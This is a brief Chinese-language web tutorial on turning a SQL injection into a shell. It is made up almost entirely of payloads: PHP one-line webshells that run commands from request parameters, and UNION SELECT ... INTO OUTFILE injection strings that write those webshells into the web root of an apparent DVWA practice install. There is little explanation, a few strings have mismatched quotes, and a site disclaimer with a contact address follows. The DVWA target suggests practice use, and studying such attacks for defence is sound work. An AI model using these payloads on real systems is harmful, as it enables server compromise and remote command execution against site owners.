SQL inject 漏洞手工利用过程详解:get shell
思路:上传一个“后门”,通过控制后门来得到shell,比如一句话***。比如:
<?system($_REQUEST['cmd']);?> //通过request提交,执行shell<?php@eval($_POST['chopper']);?>
//PHP一句话***,直接上菜刀
这里构造如下语句:
1'and 1=2 union select "<?",system($_REQUEST['cmd']);?>"
into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#
1' and 1=2 union select 1,"<?system($_REQUEST['cmd']);?>" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--
1' and 1=2 union select "<?","system($_REQUEST['cmd']);?>" into outfile "d:\\
xampp\\htdocs\\dvwa\\zzz.php"
<?php eval($_POST['888']);?>
1' and 1=2 union select 1,"<?php eval($_POST['888']);?>" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341